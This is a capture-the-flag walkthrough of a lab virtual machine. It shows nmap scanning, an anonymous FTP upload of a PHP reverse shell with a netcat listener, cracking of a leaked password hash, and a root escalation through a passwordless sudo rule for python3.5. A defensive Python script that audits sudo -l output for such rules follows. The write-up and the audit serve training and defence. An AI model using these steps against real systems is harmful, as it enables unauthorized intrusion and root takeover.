sudo nmap 10.38.1.1/24
Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)
Hmmm... ftp, ssh, and a web server... The web server serves the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extraordinary. So, back to nmap:
sudo nmap --script http-enum.nse 10.38.1.7
This revealed a folder named /files/ on the web server. Opening it in a web browser shows a directory listing. So I attempt an anonymous ftp login to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...
put temp.txt
Success! And, if I refresh the web browser, the file shows up in the listing. So, I delete that file and upload a php reverse shell that calls back to my kali box:
put shell.php
And on my kali box:
nc -nlvp 1234
And then I refresh the page in Firefox, switch back to my netcat session, and check to see what users are on this box... Interesting...
$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt
One user, shrek, and hmmm...
$ cat important.txt
run the script to see the data
/.runme.sh
Yeah... Not gonna run that... But...
$ cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'
So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell, log in via ssh, and see what we can do with sudo...
$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
88 packages can be updated.
68 updates are security updates.
Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5
Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:
root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'
invite-me: https://www.linkedin.com/in/eliastouguinho/
And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)
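A defender-side audit for exactly the sudoers mistake that gave up this box, added here as an example and not part of the original writeup: it parses the "may run the following commands" section of sudo -l output (the box's own output above is embedded as the sample) and flags root rules whose command is ALL or a bare interpreter such as python, since a bare interpreter hands over a root shell whether or not a password is required. The regexes and the interpreter list are my assumptions, not sudo's own grammar.

```python
import re
from typing import List, NamedTuple

# Constructed sample: the `sudo -l` output for shrek shown in the writeup.
SUDO_L_OUTPUT = r"""Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
"""

# Interpreters and shells that give arbitrary code execution when sudo runs them with no arguments (assumed list).
INTERPRETER_RE = re.compile(r"^(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|php[0-9.]*|lua[0-9.]*|node|bash|sh|dash|zsh|ksh)$")

# One "(runas) TAG: command" line, e.g. "(root) NOPASSWD: /usr/bin/python3.5"; runas may be "ALL : ALL".
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")

class SudoEntry(NamedTuple):
    runas: str
    nopasswd: bool
    command: str

def parse_sudo_l(text: str) -> List[SudoEntry]:
    """Return the command rules listed after 'may run the following commands' in sudo -l output."""
    entries: List[SudoEntry] = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if m is None:
            continue
        tags = m.group("tags").replace(":", " ").split()
        entries.append(SudoEntry(m.group("runas").strip(), "NOPASSWD" in tags, m.group("cmd")))
    return entries

def risky_entries(entries: List[SudoEntry]) -> List[SudoEntry]:
    """Flag rules that run as root (or ALL) and are either ALL or a bare interpreter/shell with no fixed arguments."""
    flagged = []
    for e in entries:
        runas_user = e.runas.split(":")[0].strip()      # "ALL : ALL" -> "ALL"
        if runas_user not in ("root", "ALL"):
            continue
        words = e.command.split()
        bare_interpreter = len(words) == 1 and INTERPRETER_RE.match(words[0].rsplit("/", 1)[-1]) is not None
        if e.command == "ALL" or bare_interpreter:
            flagged.append(e)
    return flagged
```

A rule that pins the interpreter to a fixed script path (for example python3 with a script argument) is not flagged, since the argument list must then match exactly; the audit is meant to catch bare interpreters like the one on this box.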
